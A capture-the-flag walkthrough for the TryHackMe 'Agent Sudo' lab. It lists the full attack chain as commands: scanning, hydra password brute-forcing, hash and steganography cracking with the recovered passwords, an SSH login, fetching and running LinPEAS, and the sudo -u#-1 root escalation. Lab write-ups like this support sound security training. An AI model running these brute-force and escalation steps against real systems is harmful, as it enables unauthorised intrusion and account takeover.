Agent Sudo

Room Link: https://tryhackme.com/room/agentsudoctf

Enumerate

nmap -A $VICTIM

nmap -p- $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

Burp

Change the user-agent to C

From

To

Hash cracking and brute-force

TCP/21 - FTP

Kali

hydra -l chris -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ftp://$VICTIM

Kali

ftp $VICTIM
Username: chris
Password: crystal

Kali

binwalk cutie.png 
binwalk cutie.png -e

Kali

zip2john 8702.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt 

Kali

7z e 8702.zip
Password: alien

Cyber Chef

Link: https://gchq.github.io/CyberChef/

Kali

steghide extract -sf cute-alien.jpg
Password: Alien51

Kali

ssh james@$VICTIM
Password: hackerrules!

Victim

ls

Kali

scp james@$VICTIM:/home/james/Alien_autospy.jpg .

LinPeas

Linpeas found that sudo is vulnerable, so I looked at the version online and found a way to escalate my privilege's.

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Privilege Escalation

Link: https://www.exploit-db.com/exploits/47502

Victim

sudo -u#-1 /bin/bash